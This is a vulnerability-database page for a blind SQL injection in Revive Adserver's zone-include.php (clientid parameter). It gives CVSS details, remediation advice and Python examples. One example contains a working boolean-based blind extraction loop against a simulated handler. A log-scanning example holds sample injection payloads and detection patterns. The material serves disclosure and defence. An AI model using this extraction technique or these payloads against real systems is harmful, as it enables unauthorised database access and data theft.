Description
A missing sanitisation of user input in the zone-include.php script of Revive Adserver 6.0.6 and earlier. A low‑privileged user could exploit the clientid parameter to perform blind SQL injection attacks. Input sanitisation has been improved to ensure that all parameters processed by the script are properly validated.
Published: 2026-06-23
Score: 8.3 High
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability originates from missing sanitisation of the user-supplied clientid parameter in zone-include.php of Revive Adserver (CWE-89). A low-privileged user can inject SQL into the query built from that parameter, producing a blind SQL injection. The CVSS 3.0 vector on this record (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H) gives a base score of 8.3 (High) and rates the integrity and availability impact high and the confidentiality impact low; the confidentiality impact is still real, since a blind injection leaks data one bit or one character per request. No public exploit has been reported (SSVC Exploitation: none) and the vulnerability is not listed in CISA's KEV catalog.

Affected Systems

The affected product is Revive Adserver, versions 6.0.6 and earlier. The CVE description states that input sanitisation has been improved so that every parameter processed by zone-include.php is validated; this page does not name the first fixed release, so confirm the fix against the vendor's release notes before treating an installation newer than 6.0.6 as patched.

Risk and Exploitability

The attack vector is a web request to zone-include.php in which the attacker controls the clientid parameter; PR:L in the CVSS vector means an authenticated low-privileged account suffices, and no user interaction is needed. Because the injection is blind, the attacker never sees query output and must infer it through a side channel: a boolean difference in the response (a row shown or hidden, a changed page size) or a timing difference from an injected delay. Extraction therefore proceeds one character, or one bit, per request, which is slow but easily scripted, and that potential for data exposure is what the high CVSS score reflects. EPSS is not yet available, and the absence of public exploits and of a KEV listing (SSVC Exploitation: none) means no exploitation has been observed so far, not that the flaw is hard to exploit; it remains an actionable risk for any site still running 6.0.6 or earlier.
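As an added illustration (this is not Revive Adserver's code; the page shows neither its schema nor the zone-include.php handler), the Python below simulates the flaw with SQLite: a hypothetical handler that concatenates clientid into its query, the same handler with integer validation and a parameterised query, and a boolean-based blind extraction loop that uses nothing but a yes/no signal and binary search over code points. The table names, the 'admin' row and the secret value are constructed for the demonstration; a time-based variant works the same way with a delay as the signal instead of a row count.

```python
import re
import sqlite3

# Constructed sample schema: a stand-in for an ad-server database, not
# Revive Adserver's schema. All names and values here are assumptions.
SCHEMA = """
CREATE TABLE clients (clientid INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE users (username TEXT, secret TEXT);
INSERT INTO clients VALUES (1, 'Acme'), (2, 'Globex');
INSERT INTO users VALUES ('admin', 's3cr3t');
"""


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def lookup_vulnerable(con, clientid):
    """Hypothetical handler: the request parameter is concatenated into the
    SQL text unsanitised, the CWE-89 pattern the advisory describes."""
    sql = "SELECT name FROM clients WHERE clientid = " + clientid
    return [row[0] for row in con.execute(sql)]


def lookup_hardened(con, clientid):
    """Same lookup with the two fixes a reviewer expects: the parameter is
    validated as a plain integer, and the query is parameterised."""
    if not re.fullmatch(r"[0-9]+", clientid):
        raise ValueError("clientid must be a non-negative integer")
    sql = "SELECT name FROM clients WHERE clientid = ?"
    return [row[0] for row in con.execute(sql, (int(clientid),))]


def boolean_oracle(handler, con, clientid):
    """The attacker's only signal: does the page show a client row?
    Errors collapse into 'no', as a web app that swallows them would."""
    try:
        return len(handler(con, clientid)) > 0
    except (sqlite3.Error, ValueError):
        return False


def extract_secret(handler, con, max_len=32):
    """Boolean-based blind extraction of users.secret for 'admin'.
    Each character is found by binary search over printable code points
    (32..126), so about 7 requests per character instead of up to 95.
    Returns (recovered_string, number_of_requests)."""
    probe = ("1 AND (SELECT unicode(substr(secret,{pos},1)) "
             "FROM users WHERE username='admin') {op} {val}")
    recovered, queries = "", 0
    for pos in range(1, max_len + 1):
        # Past the end of the string substr() is '' and unicode('') is NULL,
        # so the comparison is false and the loop stops.
        queries += 1
        if not boolean_oracle(handler, con, probe.format(pos=pos, op=">=", val=32)):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            queries += 1
            if boolean_oracle(handler, con, probe.format(pos=pos, op=">", val=mid)):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered, queries


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", extract_secret(lookup_vulnerable, db))
    print("hardened:  ", extract_secret(lookup_hardened, db))
```

Against the vulnerable handler the loop recovers the whole secret with a few dozen requests, each of which only asks "is a client row displayed?"; against the hardened handler the first probe fails validation and nothing is learned. Validating the type of clientid is what closes the hole, the parameterised query is defence in depth.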

Generated by OpenCVE AI on June 23, 2026 at 19:21 UTC.

Remediation

No vendor fix or workaround is linked on this page, although the CVE description states that input sanitisation in zone-include.php has been improved in releases after 6.0.6.

OpenCVE Recommended Actions

  • Upgrade Revive Adserver to a release later than 6.0.6 that includes the improved input sanitisation for zone-include.php.
  • If an upgrade is not immediately possible, restrict low-privileged accounts' access to zone-include.php, or enforce at the web-server or application layer that clientid is a plain integer, which removes the injection surface for this parameter.
  • Deploy a web application firewall on requests to zone-include.php. A positive rule (clientid must match ^[0-9]+$) is more robust than a signature list, because blind payloads can be short and need not contain obvious keywords.
  • Review web-server access logs and database query logs for zone-include.php requests with non-numeric clientid values, and for bursts of such requests from a single source; blind extraction needs many requests per recovered byte, so request volume is the clearest signal.
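The following Python is an added example of the log review recommended above; it is not OpenCVE's or Revive's tooling. It scans Apache combined-format access-log lines (constructed here, with an assumed path of /admin/zone-include.php), flags every zone-include.php request whose clientid is not a plain integer with a reason, and then reports sources that produced several such requests, since a burst of malformed clientid values from one address is the signature of blind extraction.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines in Apache combined format. The URL
# path and addresses are assumptions for this example, not a real install.
SAMPLE_LOG = r"""
203.0.113.5 - - [23/Jun/2026:10:00:01 +0000] "GET /admin/zone-include.php?clientid=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Jun/2026:10:00:02 +0000] "GET /admin/zone-include.php?clientid=1%20AND%201%3D1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Jun/2026:10:00:02 +0000] "GET /admin/zone-include.php?clientid=1%20AND%201%3D2 HTTP/1.1" 200 4090 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Jun/2026:10:00:03 +0000] "GET /admin/zone-include.php?clientid=1%20AND%20SLEEP(5) HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Jun/2026:10:00:04 +0000] "GET /admin/zone-include.php?clientid=7 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Jun/2026:10:00:05 +0000] "GET /admin/index.php HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+) (?P<bytes>\S+)'
)
INTEGER = re.compile(r"[0-9]+")
TIME_BASED = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\b", re.I)
BOOLEAN = re.compile(r"\b(and|or)\b|['\"()=;]", re.I)


def classify_clientid(value):
    """Return None for a well-formed integer clientid, else a reason string.
    The positive check (digits only) is the one that matters; the keyword
    checks only label what kind of payload was seen."""
    if INTEGER.fullmatch(value):
        return None
    if TIME_BASED.search(value):
        return "time-based payload"
    if BOOLEAN.search(value):
        return "boolean/stacked payload"
    return "non-integer clientid"


def scan_log(text):
    """Parse each line, keep zone-include.php requests, and flag every
    clientid value that is not a plain integer. The response size is kept
    because paired true/false probes (1=1 vs 1=2) often differ in size,
    which is the boolean oracle itself showing up in the log."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/zone-include.php"):
            continue
        for value in parse_qs(url.query).get("clientid", []):
            reason = classify_clientid(value)
            if reason:
                findings.append({
                    "ip": m["ip"], "ts": m["ts"], "clientid": value,
                    "reason": reason, "bytes": int(m["bytes"]),
                })
    return findings


def suspicious_sources(findings, threshold=3):
    """Blind injection needs many requests per recovered byte, so several
    malformed clientid values from one source outweigh any single hit."""
    counts = Counter(f["ip"] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h)
    print("sources over threshold:", suspicious_sources(hits))
```

On the constructed lines the scan flags three requests, all from 203.0.113.5, and that address crosses the burst threshold; the legitimate clientid=7 request from the other source is left alone. The same classifier doubles as the positive WAF rule from the list above.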



Advisories

No advisories yet.

References
History

Tue, 23 Jun 2026 20:30:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Revive; Revive adserver
Vendors & Products                    Revive; Revive adserver

Tue, 23 Jun 2026 19:45:00 +0000

Type                 Values Removed   Values Added
Title                                 Blind SQL Injection via Missing Input Sanitization in zone-include.php of Revive Ad Server

Tue, 23 Jun 2026 18:30:00 +0000

Type                 Values Removed   Values Added
Metrics                               ssvc 2.0.3: Automatable: no; Exploitation: none; Technical Impact: partial


Tue, 23 Jun 2026 16:45:00 +0000

Type                 Values Removed   Values Added
Description                           A missing sanitisation of user input in the zone-include.php script of Revive Adserver 6.0.6 and earlier. A low‑privileged user could exploit the clientid parameter to perform blind SQL injection attacks. Input sanitisation has been improved to ensure that all parameters processed by the script are properly validated.
Weaknesses                            CWE-89
References
Metrics                               cvssV3_0: score 8.3; vector CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H


MITRE

Status: PUBLISHED

Assigner: hackerone

Published:

Updated: 2026-06-23T17:27:08.997Z

Reserved: 2026-03-31T15:00:06.522Z

Link: CVE-2026-34914

Vulnrichment

Updated: 2026-06-23T17:27:04.087Z

NVD

No data.

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-23T20:15:04Z

Weaknesses
  • CWE-89

    Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')